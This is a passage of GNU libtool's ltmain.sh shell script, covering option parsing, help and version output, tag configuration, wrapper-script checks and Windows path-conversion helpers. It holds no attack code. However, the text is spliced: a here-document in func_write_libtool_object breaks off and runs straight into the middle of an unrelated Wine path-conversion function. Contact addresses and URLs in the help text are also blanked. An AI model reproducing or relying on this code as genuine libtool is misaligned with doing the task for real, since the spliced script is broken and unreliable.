$debug_cmd # # args_changed=false # # # Note that, for efficiency, we parse as many options as we can # # recognise in a loop before passing the remainder back to the # # caller on the first unrecognised argument we encounter. # while test $# -gt 0; do # opt=$1; shift # case $opt in # --silent|-s) opt_silent=: # args_changed=: # ;; # # Separate non-argument short options: # -s*) func_split_short_opt "$_G_opt" # set dummy "$func_split_short_opt_name" \ # "-$func_split_short_opt_arg" ${1+"$@"} # shift # args_changed=: # ;; # *) # Make sure the first unrecognised option "$_G_opt" # # is added back to "$@" in case we need it later, # # if $args_changed was set to 'true'. # set dummy "$_G_opt" ${1+"$@"}; shift; break ;; # esac # done # # # Only call 'func_quote' here if we processed at least one argument. # if $args_changed; then # func_quote eval ${1+"$@"} # my_silent_option_result=$func_quote_result # fi # } # func_add_hook func_parse_options my_silent_option # # # my_option_validation () # { # $debug_cmd # # $opt_silent && $opt_verbose && func_fatal_help "\ # '--silent' and '--verbose' options are mutually exclusive." # } # func_add_hook func_validate_options my_option_validation # # You'll also need to manually amend $usage_message to reflect the extra # options you parse. It's preferable to append if you can, so that # multiple option parsing hooks can be added safely. # func_options_finish [ARG]... # ---------------------------- # Finishing the option parse loop (call 'func_options' hooks ATM). func_options_finish () { $debug_cmd func_run_hooks func_options ${1+"$@"} func_propagate_result func_run_hooks func_options_finish } # func_options [ARG]... # --------------------- # All the functions called inside func_options are hookable. See the # individual implementations for details. func_hookable func_options func_options () { $debug_cmd _G_options_quoted=false for my_func in options_prep parse_options validate_options options_finish do func_unset func_${my_func}_result func_unset func_run_hooks_result eval func_$my_func '${1+"$@"}' func_propagate_result func_$my_func func_options if $func_propagate_result_result; then eval set dummy "$func_options_result"; shift _G_options_quoted=: fi done $_G_options_quoted || { # As we (func_options) are top-level options-parser function and # nobody quoted "$@" for us yet, we need to do it explicitly for # caller. func_quote eval ${1+"$@"} func_options_result=$func_quote_result } } # func_options_prep [ARG]... # -------------------------- # All initialisations required before starting the option parse loop. # Note that when calling hook functions, we pass through the list of # positional parameters. If a hook function modifies that list, and # needs to propagate that back to rest of this script, then the complete # modified list must be put in 'func_run_hooks_result' before returning. func_hookable func_options_prep func_options_prep () { $debug_cmd # Option defaults: opt_verbose=false opt_warning_types= func_run_hooks func_options_prep ${1+"$@"} func_propagate_result func_run_hooks func_options_prep } # func_parse_options [ARG]... # --------------------------- # The main option parsing loop. func_hookable func_parse_options func_parse_options () { $debug_cmd _G_parse_options_requote=false # this just eases exit handling while test $# -gt 0; do # Defer to hook functions for initial option parsing, so they # get priority in the event of reusing an option name. func_run_hooks func_parse_options ${1+"$@"} func_propagate_result func_run_hooks func_parse_options if $func_propagate_result_result; then eval set dummy "$func_parse_options_result"; shift # Even though we may have changed "$@", we passed the "$@" array # down into the hook and it quoted it for us (because we are in # this if-branch). No need to quote it again. _G_parse_options_requote=false fi # Break out of the loop if we already parsed every option. test $# -gt 0 || break # We expect that one of the options parsed in this function matches # and thus we remove _G_opt from "$@" and need to re-quote. _G_match_parse_options=: _G_opt=$1 shift case $_G_opt in --debug|-x) debug_cmd='set -x' func_echo "enabling shell trace mode" >&2 $debug_cmd ;; --no-warnings|--no-warning|--no-warn) set dummy --warnings none ${1+"$@"} shift ;; --warnings|--warning|-W) if test $# = 0 && func_missing_arg $_G_opt; then _G_parse_options_requote=: break fi case " $warning_categories $1" in *" $1 "*) # trailing space prevents matching last $1 above func_append_uniq opt_warning_types " $1" ;; *all) opt_warning_types=$warning_categories ;; *none) opt_warning_types=none warning_func=: ;; *error) opt_warning_types=$warning_categories warning_func=func_fatal_error ;; *) func_fatal_error \ "unsupported warning category: '$1'" ;; esac shift ;; --verbose|-v) opt_verbose=: ;; --version) func_version ;; -\?|-h) func_usage ;; --help) func_help ;; # Separate optargs to long options (plugins may need this): --*=*) func_split_equals "$_G_opt" set dummy "$func_split_equals_lhs" \ "$func_split_equals_rhs" ${1+"$@"} shift ;; # Separate optargs to short options: -W*) func_split_short_opt "$_G_opt" set dummy "$func_split_short_opt_name" \ "$func_split_short_opt_arg" ${1+"$@"} shift ;; # Separate non-argument short options: -\?*|-h*|-v*|-x*) func_split_short_opt "$_G_opt" set dummy "$func_split_short_opt_name" \ "-$func_split_short_opt_arg" ${1+"$@"} shift ;; --) _G_parse_options_requote=: ; break ;; -*) func_fatal_help "unrecognised option: '$_G_opt'" ;; *) set dummy "$_G_opt" ${1+"$@"}; shift _G_match_parse_options=false break ;; esac if $_G_match_parse_options; then _G_parse_options_requote=: fi done if $_G_parse_options_requote; then # save modified positional parameters for caller func_quote eval ${1+"$@"} func_parse_options_result=$func_quote_result fi } # func_validate_options [ARG]... # ------------------------------ # Perform any sanity checks on option settings and/or unconsumed # arguments. func_hookable func_validate_options func_validate_options () { $debug_cmd # Display all warnings if -W was not given. test -n "$opt_warning_types" || opt_warning_types=" $warning_categories" func_run_hooks func_validate_options ${1+"$@"} func_propagate_result func_run_hooks func_validate_options # Bail if the options were screwed! $exit_cmd $EXIT_FAILURE } ## ----------------- ## ## Helper functions. ## ## ----------------- ## # This section contains the helper functions used by the rest of the # hookable option parser framework in ascii-betical order. # func_fatal_help ARG... # ---------------------- # Echo program name prefixed message to standard error, followed by # a help hint, and exit. func_fatal_help () { $debug_cmd eval \$ECHO \""Usage: $usage"\" eval \$ECHO \""$fatal_help"\" func_error ${1+"$@"} exit $EXIT_FAILURE } # func_help # --------- # Echo long help message to standard output and exit. func_help () { $debug_cmd func_usage_message $ECHO "$long_help_message" exit 0 } # func_missing_arg ARGNAME # ------------------------ # Echo program name prefixed message to standard error and set global # exit_cmd. func_missing_arg () { $debug_cmd func_error "Missing argument for '$1'." exit_cmd=exit } # func_split_equals STRING # ------------------------ # Set func_split_equals_lhs and func_split_equals_rhs shell variables # after splitting STRING at the '=' sign. test -z "$_G_HAVE_XSI_OPS" \ && (eval 'x=a/b/c; test 5aa/bb/cc = "${#x}${x%%/*}${x%/*}${x#*/}${x##*/}"') 2>/dev/null \ && _G_HAVE_XSI_OPS=yes if test yes = "$_G_HAVE_XSI_OPS" then # This is an XSI compatible shell, allowing a faster implementation... eval 'func_split_equals () { $debug_cmd func_split_equals_lhs=${1%%=*} func_split_equals_rhs=${1#*=} if test "x$func_split_equals_lhs" = "x$1"; then func_split_equals_rhs= fi }' else # ...otherwise fall back to using expr, which is often a shell builtin. func_split_equals () { $debug_cmd func_split_equals_lhs=`expr "x$1" : 'x\([^=]*\)'` func_split_equals_rhs= test "x$func_split_equals_lhs" = "x$1" \ || func_split_equals_rhs=`expr "x$1" : 'x[^=]*=\(.*\)$'` } fi #func_split_equals # func_split_short_opt SHORTOPT # ----------------------------- # Set func_split_short_opt_name and func_split_short_opt_arg shell # variables after splitting SHORTOPT after the 2nd character. if test yes = "$_G_HAVE_XSI_OPS" then # This is an XSI compatible shell, allowing a faster implementation... eval 'func_split_short_opt () { $debug_cmd func_split_short_opt_arg=${1#??} func_split_short_opt_name=${1%"$func_split_short_opt_arg"} }' else # ...otherwise fall back to using expr, which is often a shell builtin. func_split_short_opt () { $debug_cmd func_split_short_opt_name=`expr "x$1" : 'x-\(.\)'` func_split_short_opt_arg=`expr "x$1" : 'x-.\(.*\)$'` } fi #func_split_short_opt # func_usage # ---------- # Echo short help message to standard output and exit. func_usage () { $debug_cmd func_usage_message $ECHO "Run '$progname --help |${PAGER-more}' for full usage" exit 0 } # func_usage_message # ------------------ # Echo short help message to standard output. func_usage_message () { $debug_cmd eval \$ECHO \""Usage: $usage"\" echo $SED -n 's|^# || /^Written by/{ x;p;x } h /^Written by/q' < "$progpath" echo eval \$ECHO \""$usage_message"\" } # func_version # ------------ # Echo version message to standard output and exit. # The version message is extracted from the calling file's header # comments, with leading '# ' stripped: # 1. First display the progname and version # 2. Followed by the header comment line matching /^# Written by / # 3. Then a blank line followed by the first following line matching # /^# Copyright / # 4. Immediately followed by any lines between the previous matches, # except lines preceding the intervening completely blank line. # For example, see the header comments of this file. func_version () { $debug_cmd printf '%s\n' "$progname $scriptversion" $SED -n ' /^# Written by /!b s|^# ||; p; n :fwd2blnk /./ { n b fwd2blnk } p; n :holdwrnt s|^# || s|^# *$|| /^Copyright /!{ /./H n b holdwrnt } s|\((C)\)[ 0-9,-]*[ ,-]\([1-9][0-9]* \)|\1 \2| G s|\(\n\)\n*|\1|g p; q' < "$progpath" exit $? } # Local variables: # mode: shell-script # sh-indentation: 2 # eval: (add-hook 'before-save-hook 'time-stamp) # time-stamp-pattern: "30/scriptversion=%:y-%02m-%02d.%02H; # UTC" # time-stamp-time-zone: "UTC" # End: # Set a version string. scriptversion='(GNU libtool) 2.4.6.42-b88ce' # func_echo ARG... # ---------------- # Libtool also displays the current mode in messages, so override # funclib.sh func_echo with this custom definition. func_echo () { $debug_cmd _G_message=$* func_echo_IFS=$IFS IFS=$nl for _G_line in $_G_message; do IFS=$func_echo_IFS $ECHO "$progname${opt_mode+: $opt_mode}: $_G_line" done IFS=$func_echo_IFS } # func_warning ARG... # ------------------- # Libtool warnings are not categorized, so override funclib.sh # func_warning with this simpler definition. func_warning () { $debug_cmd $warning_func ${1+"$@"} } ## ---------------- ## ## Options parsing. ## ## ---------------- ## # Hook in the functions to make sure our own options are parsed during # the option parsing loop. usage='$progpath [OPTION]... [MODE-ARG]...' # Short help message in response to '-h'. usage_message="Options: --config show all configuration variables --debug enable verbose shell tracing -n, --dry-run display commands without modifying any files --features display basic configuration information and exit --mode=MODE use operation mode MODE --no-warnings equivalent to '-Wnone' --preserve-dup-deps don't remove duplicate dependency libraries --quiet, --silent don't print informational messages --tag=TAG use configuration variables from tag TAG -v, --verbose print more informational messages than default --version print version information -W, --warnings=CATEGORY report the warnings falling in CATEGORY [all] -h, --help, --help-all print short, long, or detailed help message " # Additional text appended to 'usage_message' in response to '--help'. func_help () { $debug_cmd func_usage_message $ECHO "$long_help_message MODE must be one of the following: clean remove files from the build directory compile compile a source file into a libtool object execute automatically set library path, then run a program finish complete the installation of libtool libraries install install libraries or executables link create a library or an executable uninstall remove libraries from an installed directory MODE-ARGS vary depending on the MODE. When passed as first option, '--mode=MODE' may be abbreviated as 'MODE' or a unique abbreviation of that. Try '$progname --help --mode=MODE' for a more detailed description of MODE. When reporting a bug, please describe a test case to reproduce it and include the following information: host-triplet: $host shell: $SHELL compiler: $LTCC compiler flags: $LTCFLAGS linker: $LD (gnu? $with_gnu_ld) version: $progname (GNU libtool) 2.4.6.42-b88ce automake: `($AUTOMAKE --version) 2>/dev/null |$SED 1q` autoconf: `($AUTOCONF --version) 2>/dev/null |$SED 1q` Report bugs to . GNU libtool home page: . General help using GNU software: ." exit 0 } # func_lo2o OBJECT-NAME # --------------------- # Transform OBJECT-NAME from a '.lo' suffix to the platform specific # object suffix. lo2o=s/\\.lo\$/.$objext/ o2lo=s/\\.$objext\$/.lo/ if test yes = "$_G_HAVE_XSI_OPS"; then eval 'func_lo2o () { case $1 in *.lo) func_lo2o_result=${1%.lo}.$objext ;; * ) func_lo2o_result=$1 ;; esac }' # func_xform LIBOBJ-OR-SOURCE # --------------------------- # Transform LIBOBJ-OR-SOURCE from a '.o' or '.c' (or otherwise) # suffix to a '.lo' libtool-object suffix. eval 'func_xform () { func_xform_result=${1%.*}.lo }' else # ...otherwise fall back to using sed. func_lo2o () { func_lo2o_result=`$ECHO "$1" | $SED "$lo2o"` } func_xform () { func_xform_result=`$ECHO "$1" | $SED 's|\.[^.]*$|.lo|'` } fi # func_fatal_configuration ARG... # ------------------------------- # Echo program name prefixed message to standard error, followed by # a configuration failure hint, and exit. func_fatal_configuration () { func_fatal_error ${1+"$@"} \ "See the $PACKAGE documentation for more information." \ "Fatal configuration error." } # func_config # ----------- # Display the configuration for all the tags in this script. func_config () { re_begincf='^# ### BEGIN LIBTOOL' re_endcf='^# ### END LIBTOOL' # Default configuration. $SED "1,/$re_begincf CONFIG/d;/$re_endcf CONFIG/,\$d" < "$progpath" # Now print the configurations for the tags. for tagname in $taglist; do $SED -n "/$re_begincf TAG CONFIG: $tagname\$/,/$re_endcf TAG CONFIG: $tagname\$/p" < "$progpath" done exit $? } # func_features # ------------- # Display the features supported by this script. func_features () { echo "host: $host" if test yes = "$build_libtool_libs"; then echo "enable shared libraries" else echo "disable shared libraries" fi if test yes = "$build_old_libs"; then echo "enable static libraries" else echo "disable static libraries" fi exit $? } # func_enable_tag TAGNAME # ----------------------- # Verify that TAGNAME is valid, and either flag an error and exit, or # enable the TAGNAME tag. We also add TAGNAME to the global $taglist # variable here. func_enable_tag () { # Global variable: tagname=$1 re_begincf="^# ### BEGIN LIBTOOL TAG CONFIG: $tagname\$" re_endcf="^# ### END LIBTOOL TAG CONFIG: $tagname\$" sed_extractcf=/$re_begincf/,/$re_endcf/p # Validate tagname. case $tagname in *[!-_A-Za-z0-9,/]*) func_fatal_error "invalid tag name: $tagname" ;; esac # Don't test for the "default" C tag, as we know it's # there but not specially marked. case $tagname in CC) ;; *) if $GREP "$re_begincf" "$progpath" >/dev/null 2>&1; then taglist="$taglist $tagname" # Evaluate the configuration. Be careful to quote the path # and the sed script, to avoid splitting on whitespace, but # also don't use non-portable quotes within backquotes within # quotes we have to do it in 2 steps: extractedcf=`$SED -n -e "$sed_extractcf" < "$progpath"` eval "$extractedcf" else func_error "ignoring unknown tag $tagname" fi ;; esac } # func_check_version_match # ------------------------ # Ensure that we are using m4 macros, and libtool script from the same # release of libtool. func_check_version_match () { if test "$package_revision" != "$macro_revision"; then if test "$VERSION" != "$macro_version"; then if test -z "$macro_version"; then cat >&2 <<_LT_EOF $progname: Version mismatch error. This is $PACKAGE $VERSION, but the $progname: definition of this LT_INIT comes from an older release. $progname: You should recreate aclocal.m4 with macros from $PACKAGE $VERSION $progname: and run autoconf again. _LT_EOF else cat >&2 <<_LT_EOF $progname: Version mismatch error. This is $PACKAGE $VERSION, but the $progname: definition of this LT_INIT comes from $PACKAGE $macro_version. $progname: You should recreate aclocal.m4 with macros from $PACKAGE $VERSION $progname: and run autoconf again. _LT_EOF fi else cat >&2 <<_LT_EOF $progname: Version mismatch error. This is $PACKAGE $VERSION, revision $package_revision, $progname: but the definition of this LT_INIT comes from revision $macro_revision. $progname: You should recreate aclocal.m4 with macros from revision $package_revision $progname: of $PACKAGE $VERSION and run autoconf again. _LT_EOF fi exit $EXIT_MISMATCH fi } # libtool_options_prep [ARG]... # ----------------------------- # Preparation for options parsed by libtool. libtool_options_prep () { $debug_mode # Option defaults: opt_config=false opt_dlopen= opt_dry_run=false opt_help=false opt_mode= opt_preserve_dup_deps=false opt_quiet=false nonopt= preserve_args= _G_rc_lt_options_prep=: # Shorthand for --mode=foo, only valid as the first argument case $1 in clean|clea|cle|cl) shift; set dummy --mode clean ${1+"$@"}; shift ;; compile|compil|compi|comp|com|co|c) shift; set dummy --mode compile ${1+"$@"}; shift ;; execute|execut|execu|exec|exe|ex|e) shift; set dummy --mode execute ${1+"$@"}; shift ;; finish|finis|fini|fin|fi|f) shift; set dummy --mode finish ${1+"$@"}; shift ;; install|instal|insta|inst|ins|in|i) shift; set dummy --mode install ${1+"$@"}; shift ;; link|lin|li|l) shift; set dummy --mode link ${1+"$@"}; shift ;; uninstall|uninstal|uninsta|uninst|unins|unin|uni|un|u) shift; set dummy --mode uninstall ${1+"$@"}; shift ;; *) _G_rc_lt_options_prep=false ;; esac if $_G_rc_lt_options_prep; then # Pass back the list of options. func_quote eval ${1+"$@"} libtool_options_prep_result=$func_quote_result fi } func_add_hook func_options_prep libtool_options_prep # libtool_parse_options [ARG]... # --------------------------------- # Provide handling for libtool specific options. libtool_parse_options () { $debug_cmd _G_rc_lt_parse_options=false # Perform our own loop to consume as many options as possible in # each iteration. while test $# -gt 0; do _G_match_lt_parse_options=: _G_opt=$1 shift case $_G_opt in --dry-run|--dryrun|-n) opt_dry_run=: ;; --config) func_config ;; --dlopen|-dlopen) opt_dlopen="${opt_dlopen+$opt_dlopen }$1" shift ;; --preserve-dup-deps) opt_preserve_dup_deps=: ;; --features) func_features ;; --finish) set dummy --mode finish ${1+"$@"}; shift ;; --help) opt_help=: ;; --help-all) opt_help=': help-all' ;; --mode) test $# = 0 && func_missing_arg $_G_opt && break opt_mode=$1 case $1 in # Valid mode arguments: clean|compile|execute|finish|install|link|relink|uninstall) ;; # Catch anything else as an error *) func_error "invalid argument for $_G_opt" exit_cmd=exit break ;; esac shift ;; --no-silent|--no-quiet) opt_quiet=false func_append preserve_args " $_G_opt" ;; --no-warnings|--no-warning|--no-warn) opt_warning=false func_append preserve_args " $_G_opt" ;; --no-verbose) opt_verbose=false func_append preserve_args " $_G_opt" ;; --silent|--quiet) opt_quiet=: opt_verbose=false func_append preserve_args " $_G_opt" ;; --tag) test $# = 0 && func_missing_arg $_G_opt && break opt_tag=$1 func_append preserve_args " $_G_opt $1" func_enable_tag "$1" shift ;; --verbose|-v) opt_quiet=false opt_verbose=: func_append preserve_args " $_G_opt" ;; # An option not handled by this hook function: *) set dummy "$_G_opt" ${1+"$@"} ; shift _G_match_lt_parse_options=false break ;; esac $_G_match_lt_parse_options && _G_rc_lt_parse_options=: done if $_G_rc_lt_parse_options; then # save modified positional parameters for caller func_quote eval ${1+"$@"} libtool_parse_options_result=$func_quote_result fi } func_add_hook func_parse_options libtool_parse_options # libtool_validate_options [ARG]... # --------------------------------- # Perform any sanity checks on option settings and/or unconsumed # arguments. libtool_validate_options () { # save first non-option argument if test 0 -lt $#; then nonopt=$1 shift fi # preserve --debug test : = "$debug_cmd" || func_append preserve_args " --debug" case $host in # Solaris2 added to fix http://debbugs.gnu.org/cgi/bugreport.cgi?bug=16452 # see also: http://gcc.gnu.org/bugzilla/show_bug.cgi?id=59788 *cygwin* | *mingw* | *pw32* | *cegcc* | *solaris2* | *os2*) # don't eliminate duplications in $postdeps and $predeps opt_duplicate_compiler_generated_deps=: ;; *) opt_duplicate_compiler_generated_deps=$opt_preserve_dup_deps ;; esac $opt_help || { # Sanity checks first: func_check_version_match test yes != "$build_libtool_libs" \ && test yes != "$build_old_libs" \ && func_fatal_configuration "not configured to build any kind of library" # Darwin sucks eval std_shrext=\"$shrext_cmds\" # Only execute mode is allowed to have -dlopen flags. if test -n "$opt_dlopen" && test execute != "$opt_mode"; then func_error "unrecognized option '-dlopen'" $ECHO "$help" 1>&2 exit $EXIT_FAILURE fi # Change the help message to a mode-specific one. generic_help=$help help="Try '$progname --help --mode=$opt_mode' for more information." } # Pass back the unparsed argument list func_quote eval ${1+"$@"} libtool_validate_options_result=$func_quote_result } func_add_hook func_validate_options libtool_validate_options # Process options as early as possible so that --help and --version # can return quickly. func_options ${1+"$@"} eval set dummy "$func_options_result"; shift ## ----------- ## ## Main. ## ## ----------- ## magic='%%%MAGIC variable%%%' magic_exe='%%%MAGIC EXE variable%%%' # Global variables. extracted_archives= extracted_serial=0 # If this variable is set in any of the actions, the command in it # will be execed at the end. This prevents here-documents from being # left over by shells. exec_cmd= # A function that is used when there is no print builtin or printf. func_fallback_echo () { eval 'cat <<_LTECHO_EOF $1 _LTECHO_EOF' } # func_generated_by_libtool # True iff stdin has been generated by Libtool. This function is only # a basic sanity check; it will hardly flush out determined imposters. func_generated_by_libtool_p () { $GREP "^# Generated by .*$PACKAGE" > /dev/null 2>&1 } # func_lalib_p file # True iff FILE is a libtool '.la' library or '.lo' object file. # This function is only a basic sanity check; it will hardly flush out # determined imposters. func_lalib_p () { test -f "$1" && $SED -e 4q "$1" 2>/dev/null | func_generated_by_libtool_p } # func_lalib_unsafe_p file # True iff FILE is a libtool '.la' library or '.lo' object file. # This function implements the same check as func_lalib_p without # resorting to external programs. To this end, it redirects stdin and # closes it afterwards, without saving the original file descriptor. # As a safety measure, use it only where a negative result would be # fatal anyway. Works if 'file' does not exist. func_lalib_unsafe_p () { lalib_p=no if test -f "$1" && test -r "$1" && exec 5<&0 <"$1"; then for lalib_p_l in 1 2 3 4 do read lalib_p_line case $lalib_p_line in \#\ Generated\ by\ *$PACKAGE* ) lalib_p=yes; break;; esac done exec 0<&5 5<&- fi test yes = "$lalib_p" } # func_ltwrapper_script_p file # True iff FILE is a libtool wrapper script # This function is only a basic sanity check; it will hardly flush out # determined imposters. func_ltwrapper_script_p () { test -f "$1" && $lt_truncate_bin < "$1" 2>/dev/null | func_generated_by_libtool_p } # func_ltwrapper_executable_p file # True iff FILE is a libtool wrapper executable # This function is only a basic sanity check; it will hardly flush out # determined imposters. func_ltwrapper_executable_p () { func_ltwrapper_exec_suffix= case $1 in *.exe) ;; *) func_ltwrapper_exec_suffix=.exe ;; esac $GREP "$magic_exe" "$1$func_ltwrapper_exec_suffix" >/dev/null 2>&1 } # func_ltwrapper_scriptname file # Assumes file is an ltwrapper_executable # uses $file to determine the appropriate filename for a # temporary ltwrapper_script. func_ltwrapper_scriptname () { func_dirname_and_basename "$1" "" "." func_stripname '' '.exe' "$func_basename_result" func_ltwrapper_scriptname_result=$func_dirname_result/$objdir/${func_stripname_result}_ltshwrapper } # func_ltwrapper_p file # True iff FILE is a libtool wrapper script or wrapper executable # This function is only a basic sanity check; it will hardly flush out # determined imposters. func_ltwrapper_p () { func_ltwrapper_script_p "$1" || func_ltwrapper_executable_p "$1" } # func_execute_cmds commands fail_cmd # Execute tilde-delimited COMMANDS. # If FAIL_CMD is given, eval that upon failure. # FAIL_CMD may read-access the current command in variable CMD! func_execute_cmds () { $debug_cmd save_ifs=$IFS; IFS='~' for cmd in $1; do IFS=$sp$nl eval cmd=\"$cmd\" IFS=$save_ifs func_show_eval "$cmd" "${2-:}" done IFS=$save_ifs } # func_source file # Source FILE, adding directory component if necessary. # Note that it is not necessary on cygwin/mingw to append a dot to # FILE even if both FILE and FILE.exe exist: automatic-append-.exe # behavior happens only for exec(3), not for open(2)! Also, sourcing # 'FILE.' does not work on cygwin managed mounts. func_source () { $debug_cmd case $1 in */* | *\\*) . "$1" ;; *) . "./$1" ;; esac } # func_resolve_sysroot PATH # Replace a leading = in PATH with a sysroot. Store the result into # func_resolve_sysroot_result func_resolve_sysroot () { func_resolve_sysroot_result=$1 case $func_resolve_sysroot_result in =*) func_stripname '=' '' "$func_resolve_sysroot_result" func_resolve_sysroot_result=$lt_sysroot$func_stripname_result ;; esac } # func_replace_sysroot PATH # If PATH begins with the sysroot, replace it with = and # store the result into func_replace_sysroot_result. func_replace_sysroot () { case $lt_sysroot:$1 in ?*:"$lt_sysroot"*) func_stripname "$lt_sysroot" '' "$1" func_replace_sysroot_result='='$func_stripname_result ;; *) # Including no sysroot. func_replace_sysroot_result=$1 ;; esac } # func_infer_tag arg # Infer tagged configuration to use if any are available and # if one wasn't chosen via the "--tag" command line option. # Only attempt this if the compiler in the base compile # command doesn't match the default compiler. # arg is usually of the form 'gcc ...' func_infer_tag () { $debug_cmd if test -n "$available_tags" && test -z "$tagname"; then CC_quoted= for arg in $CC; do func_append_quoted CC_quoted "$arg" done CC_expanded=`func_echo_all $CC` CC_quoted_expanded=`func_echo_all $CC_quoted` case $@ in # Blanks in the command may have been stripped by the calling shell, # but not from the CC environment variable when configure was run. " $CC "* | "$CC "* | " $CC_expanded "* | "$CC_expanded "* | \ " $CC_quoted"* | "$CC_quoted "* | " $CC_quoted_expanded "* | "$CC_quoted_expanded "*) ;; # Blanks at the start of $base_compile will cause this to fail # if we don't check for them as well. *) for z in $available_tags; do if $GREP "^# ### BEGIN LIBTOOL TAG CONFIG: $z$" < "$progpath" > /dev/null; then # Evaluate the configuration. eval "`$SED -n -e '/^# ### BEGIN LIBTOOL TAG CONFIG: '$z'$/,/^# ### END LIBTOOL TAG CONFIG: '$z'$/p' < $progpath`" CC_quoted= for arg in $CC; do # Double-quote args containing other shell metacharacters. func_append_quoted CC_quoted "$arg" done CC_expanded=`func_echo_all $CC` CC_quoted_expanded=`func_echo_all $CC_quoted` case "$@ " in " $CC "* | "$CC "* | " $CC_expanded "* | "$CC_expanded "* | \ " $CC_quoted"* | "$CC_quoted "* | " $CC_quoted_expanded "* | "$CC_quoted_expanded "*) # The compiler in the base compile command matches # the one in the tagged configuration. # Assume this is the tagged configuration we want. tagname=$z break ;; esac fi done # If $tagname still isn't set, then no tagged configuration # was found and let the user know that the "--tag" command # line option must be used. if test -z "$tagname"; then func_echo "unable to infer tagged configuration" func_fatal_error "specify a tag with '--tag'" # else # func_verbose "using $tagname tagged configuration" fi ;; esac fi } # func_write_libtool_object output_name pic_name nonpic_name # Create a libtool object file (analogous to a ".la" file), # but don't create it if we're doing a dry run. func_write_libtool_object () { write_libobj=$1 if test yes = "$build_libtool_libs"; then write_lobj=\'$2\' else write_lobj=none fi if test yes = "$build_old_libs"; then write_oldobj=\'$3\' else write_oldobj=none fi $opt_dry_run || { cat >${write_libobj}T </dev/null` if test "$?" -eq 0 && test -n "$func_convert_core_file_wine_to_w32_tmp"; then func_convert_core_file_wine_to_w32_result=`$ECHO "$func_convert_core_file_wine_to_w32_tmp" | $SED -e "$sed_naive_backslashify"` else func_convert_core_file_wine_to_w32_result= fi fi } # end: func_convert_core_file_wine_to_w32 # func_convert_core_path_wine_to_w32 ARG # Helper function used by path conversion functions when $build is *nix, and # $host is mingw, cygwin, or some other w32 environment. Relies on a correctly # configured wine environment available, with the winepath program in $build's # $PATH. Assumes ARG has no leading or trailing path separator characters. # # ARG is path to be converted from $build format to win32. # Result is available in $func_convert_core_path_wine_to_w32_result. # Unconvertible file (directory) names in ARG are skipped; if no directory names # are convertible, then the result may be empty. func_convert_core_path_wine_to_w32 () { $debug_cmd # unfortunately, winepath doesn't convert paths, only file names func_convert_core_path_wine_to_w32_result= if test -n "$1"; then oldIFS=$IFS IFS=: for func_convert_core_path_wine_to_w32_f in $1; do IFS=$oldIFS func_convert_core_file_wine_to_w32 "$func_convert_core_path_wine_to_w32_f" if test -n "$func_convert_core_file_wine_to_w32_result"; then if test -z "$func_convert_core_path_wine_to_w32_result"; then func_convert_core_path_wine_to_w32_result=$func_convert_core_file_wine_to_w32_result else func_append func_convert_core_path_wine_to_w32_result ";$func_convert_core_file_wine_to_w32_result" fi fi done IFS=$oldIFS fi } # end: func_convert_core_path_wine_to_w32 # func_cygpath ARGS... # Wrapper around calling the cygpath program via LT_CYGPATH. This is used when # when (1) $build is *nix and Cygwin is hosted via a wine environment; or (2) # $build is MSYS and $host is Cygwin, or (3) $build is Cygwin. In case (1) or # (2), returns the Cygwin file name or path in func_cygpath_result (input # file name or path is assumed to be in w32 format, as previously converted # from $build's *nix or MSYS format). In case (3), returns the w32 file name # or path in func_cygpath_result (input file name or path is assumed to be in # Cygwin format). Returns an empty string on error. # # ARGS are passed to cygpath, with the last one being the file name or path to # be converted. # # Specify the absolute *nix (or w32) name to cygpath in the LT_CYGPATH # environment variable; do not put it in $PATH. func_cygpath () { $debug_cmd if test -n "$LT_CYGPATH" && test -f "$LT_CYGPATH"; then func_cygpath_result=`$LT_CYGPATH "$@" 2>/dev/null` if test "$?" -ne 0; then # on failure, ensure result is empty func_cygpath_result= fi else func_cygpath_result= func_error "LT_CYGPATH is empty or specifies non-existent file: '$LT_CYGPATH'" fi } #end: func_cygpath # func_convert_core_msys_to_w32 ARG # Convert file name or path ARG from MSYS format to w32 format. Return # result in func_convert_core_msys_to_w32_result. func_convert_core_msys_to_w32 () { $debug_cmd # awkward: cmd appends spaces to result func_convert_core_msys_to_w32_result=`( cmd //c echo "$1" ) 2>/dev/null | $SED -e 's/[ ]*$//' -e "$sed_naive_backslashify"` } #end: func_convert_core_msys_to_w32 # func_convert_file_check ARG1 ARG2 # Verify that ARG1 (a file name in $build format) was converted to $host # format in ARG2. Otherwise, emit an error message, but continue (resetting # func_to_host_file_result to ARG1). func_convert_file_check () { $debug_cmd if test -z "$2" && test -n "$1"; then func_error "Could not determine host file name corresponding to" func_error " '$1'" func_error "Continuing, but uninstalled executables may not work." # Fallback: func_to_host_file_result=$1 fi } # end func_convert_file_check # func_convert_path_check FROM_PATHSEP TO_PATHSEP FROM_PATH TO_PATH # Verify that FROM_PATH (a path in $build format) was converted to $host # format in TO_PATH. Otherwise, emit an error message, but continue, resetting # func_to_host_file_result to a simplistic fallback value (see below). func_convert_path_check () { $debug_cmd if test -z "$4" && test -n "$3"; then func_error "Could not determine the host path corresponding to" func_error " '$3'" func_error "Continuing, but uninstalled executables may not work." # Fallback. This is a deliberately simplistic "conversion" and # should not be "improved". See libtool.info. if test "x$1" != "x$2"; then lt_replace_pathsep_chars="s|$1|$2|g" func_to_host_path_result=`echo "$3" | $SED -e "$lt_replace_pathsep_chars"` else func_to_host_path_result=$3 fi fi } # end func_convert_path_check # func_convert_path_front_back_pathsep FRONTPAT BACKPAT REPL ORIG # Modifies func_to_host_path_result by prepending REPL if ORIG matches FRONTPAT # and appending REPL if ORIG matches BACKPAT. func_convert_path_front_back_pathsep () { $debug_cmd case $4 in $1 ) func_to_host_path_result=$3$func_to_host_path_result ;; esac case $4 in $2 ) func_append func_to_host_path_result "$3" ;; esac } # end func_convert_path_front_back_pathsep ################################################## # $build to $host FILE NAME CONVERSION FUNCTIONS # ################################################## # invoked via '$to_host_file_cmd ARG' # # In each case, ARG is the path to be converted from $build to $host format. # Result will be available in $func_to_host_file_result. # func_to_host_file ARG # Converts the file name ARG from $build format to $host format. Return result # in func_to_host_file_result. func_to_host_file () { $debug_cmd $to_host_file_cmd "$1" } # end func_to_host_file # func_to_tool_file ARG LAZY # converts the file name ARG from $build format to toolchain format. Return # result in func_to_tool_file_result. If the conversion in use is listed # in (the comma separated) LAZY, no conversion takes place. func_to_tool_file () { $debug_cmd case ,$2, in *,"$to_tool_file_cmd",*) func_to_tool_file_result=$1 ;; *) $to_tool_file_cmd "$1" func_to_tool_file_result=$func_to_host_file_result ;; esac } # end func_to_tool_file # func_convert_file_noop ARG # Copy ARG to func_to_host_file_result. func_convert_file_noop () { func_to_host_file_result=$1 